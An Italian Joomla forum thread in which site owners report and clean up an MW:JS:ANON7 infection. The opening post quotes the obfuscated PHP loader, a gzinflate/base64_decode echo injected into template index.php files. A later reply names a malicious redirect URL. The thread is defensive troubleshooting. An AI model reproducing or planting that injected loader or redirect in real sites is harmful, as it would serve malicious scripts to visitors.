Autore Topic: [RISOLTO] malware MW:JS:ANON7 su Joomla 2.5  (Letto 7544 volte)

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« il: 12 Lug 2012, 14:37:41 »
Ciao a tutti, apro questa discussione nel tentativo di rendermi utile. Stamattina ho trovato un malware su un sito joomla 2.5.6 (ultima versione rilasciata al momento in cui scrivo).
Mi sono accorto che il sito risultava lento, quindi guardando i link ho visto che nell'aprire le pagine chiamava anche url esterne.
Ho fatto una scansione del sito con Sucuri.net ed effettivamente il sito risultava infetto da MW:JS:ANON7, il quale generava script javascript che puntavano agli url esterni.
Il codice che generava gli script il seguente
Codice: [Seleziona]
#c3284d#
echo(gzinflate(base64_decode("JYxRCoAgEAWvIvufC31G1lk2kzJKF31E3b6oz5mB6asvUWFwa3CEcIE3OeW3ZGrxjlZAO2afj0bS3GiJCfYlztPGFYJqddUxzq4lk+R4R0vOyx6+RkPP/254AA==")));
#/c3284d#
e si trovava negli index.php di tutti i template installati, prima della sezione <head>.
Spero che l'esperienza risulti utile ad altri.
A presto.
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

Offline miky_2

  • Esploratore
  • **
  • Post: 127
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #1 il: 12 Lug 2012, 15:33:37 »
thanks...


quindi speriamo in un aggiornamento il prima possibile, in modo da coprire la falla  ;)

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #2 il: 12 Lug 2012, 15:38:57 »
Citazione
thanks...
Figurati!
Citazione
quindi speriamo in un aggiornamento il prima possibile, in modo da coprire la falla 
Gi, speriamo sia presto.
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

mau_develop

  • Visitatore
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #3 il: 12 Lug 2012, 17:13:07 »
quindi speriamo in un aggiornamento il prima possibile, in modo da coprire la falla
---------------------------------------------------
oddio ...sono rimasto indietro... che falla?

M.

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #4 il: 12 Lug 2012, 17:18:40 »
Ciao mau_develop, non detto che sia una falla di joomla, potrebbe trattarsi di un'estensione di terzi. Per sul sito in questione sono installati solo gantry framework e S5 Image and Content Fader v2. Sto provando a vedere se trovo chi ha generato il buco che ha portato al malware in oggetto (tra l'altro il sito stato pubblicato solo ieri su un url di terzo livello allo scopo di farlo vedere al cliente)
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

mau_develop

  • Visitatore
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #5 il: 12 Lug 2012, 17:36:59 »
non importa cosa installato e non trovi nessuno tra i log.
Quando navigate usate noscript, una noia sbloccare cose utili ma ti salva il sederino tante volte

PS fai una bella scansione offline del pc con un paio di AV

M.

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #6 il: 12 Lug 2012, 17:48:37 »
Citazione
non importa cosa installato e non trovi nessuno tra i log.
Quando navigate usate noscript, una noia sbloccare cose utili ma ti salva il sederino tante volte

PS fai una bella scansione offline del pc con un paio di AV
Uso noscript ed il problema stato gi risolto.
Stavo provando a vedere se gantry o lo slide permettono in qualche punto di scrivere sui file, per essere pi preciso nella soluzione. Il sito, per, ripeto, stato pulito e lo tutt'ora.
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

mau_develop

  • Visitatore
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #7 il: 12 Lug 2012, 18:44:26 »
hai provato a guardare come sono messi gli altri siti sul tuo server... se un hosting condiviso.
Guarda anche se nella cartella tmp c' qualcosa e toglila, solitamente la shell o cmq la backdoor... se il server tuo dai un occhiata anche nella tmp del server.

... cos ... un idea...

M.
« Ultima modifica: 12 Lug 2012, 18:46:58 da mau_develop »

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #8 il: 13 Lug 2012, 10:15:40 »
Citazione
hai provato a guardare come sono messi gli altri siti sul tuo server... se un hosting condiviso.
Le cartelle tmp erano pulite, avevo gi controllato, ma gli altri siti presenti su quel server, sia joomla 2.5 che joomla 1.5, erano stati bucati.
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

mau_develop

  • Visitatore
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #9 il: 13 Lug 2012, 20:19:00 »
per caso salvi sessioni su file?

M.

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #10 il: 14 Lug 2012, 09:24:41 »
Non salvo sessioni su file.
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

mau_develop

  • Visitatore
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #11 il: 14 Lug 2012, 22:05:29 »
sono attacchi dove non necessariamente il sito un cms o cmq  vulnerabile.
cerco di raccogliere info perch sicuramente un hosting ben lungi dal comunicare attacchi ai server anche se a volte sono palesi... dai mi vuoi dire che c' uno che per ogni appz sta l a cercare l'esploit? o che tutti gli admin dei siti su quel server fanno i birichini e guardano i siti che non si deve?...
..credo che esistano una variet di usi di questo tipo di esploit e questo fa supporre una botnet con qualche bel servizio a qualche centinaio di dollari che usa lo stesso principio ma cambia padrone e quindi scopi.

qu spiegato + o - semplicemente https://badwarebusters.org/main/itemview/15688
... e se vedi la data ti accorgi da quanto va avanti qs gioco cambiando di forma ogni volta...
M.

Offline lucia86

  • Esploratore
  • **
  • Post: 196
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #12 il: 16 Lug 2012, 01:18:08 »
l'ho letto per caso questo post! lo stesso mio virus e ho trovato il codice nel template!! per risolvere il problema basta cancellare il codice nei template sul sito e il problema si risolve?

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #13 il: 16 Lug 2012, 09:44:17 »
Ciao Lucia86, cancellando il codice il problema si risolve, almeno momentaneamente, nel senso che devi individuare, magari insieme a chi ti fa hosting, qual' stato l'attacco che infettato il sito, altrimenti rischi che si ripeta. Io, comunque, ho cancellato il codice all'apertura del post e ad oggi i siti risultano puliti.
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #14 il: 16 Lug 2012, 09:48:21 »
Ciao Mau_develop, hai ragione sulla resistenza di chi fa hosting. Purtroppo sono coscente del fatto che il server su cui si trova qualcuno dei miei siti (tra cui il mio) stato messo sotto attacco. L'impressione che ho avuto, dalle notizie che mi sono state date, che sia stato bucato l'ftp server, con lo scopo di fare spam.
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

Offline lucia86

  • Esploratore
  • **
  • Post: 196
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #15 il: 16 Lug 2012, 10:14:52 »
Ciao io ho tolto il codice dal template ma continua a dirmi che c' un problema quando faccio l'analisi del sito su http://sitecheck.sucuri.net

Suspicious conditional redirect.
Details:
http://sucuri.net/malware/entry/MW:HTA:7
 Redirects users to:http://methuenedge.com/stats.php

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #16 il: 16 Lug 2012, 10:17:41 »
Sei sicura di aver tolto il codice da tutti i file in cui si trovava?
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

Offline lucia86

  • Esploratore
  • **
  • Post: 196
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #17 il: 16 Lug 2012, 10:22:57 »
sono solo i file index.php del template?

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #18 il: 16 Lug 2012, 10:25:07 »
Nel mio caso era cos, ma i file erano relativi a tutti i template
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

Offline lucia86

  • Esploratore
  • **
  • Post: 196
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #19 il: 16 Lug 2012, 10:32:24 »
c' qualche metodo per fare una ricerca automatica di quel codice in tutte le pagine del sito?

Offline apagano

  • Appassionato
  • ***
  • Post: 392
  • Sesso: Maschio
  • Il futuro lo si crea, non lo si subisce
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #20 il: 16 Lug 2012, 10:33:42 »
Io ho fatto una copia in locale e ho fatto la ricerca su quest'ultima
Guarda i nostri lavori e chiedi un preventivo gratuito per il tuo sito professionale: http://digedit.it/siti-web-realizzati.html. Sconti per le web agency.
Guarda i nostri video-tutorial per joomla: www.youtube.com/user/digedit2011

Offline lucia86

  • Esploratore
  • **
  • Post: 196
    • Mostra profilo
Re:[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5
« Risposta #21 il: 18 Lug 2012, 11:23:07 »
rimuovo il codice dal template e poi scopro che sul server si reinstalla..

 

Host

Torna su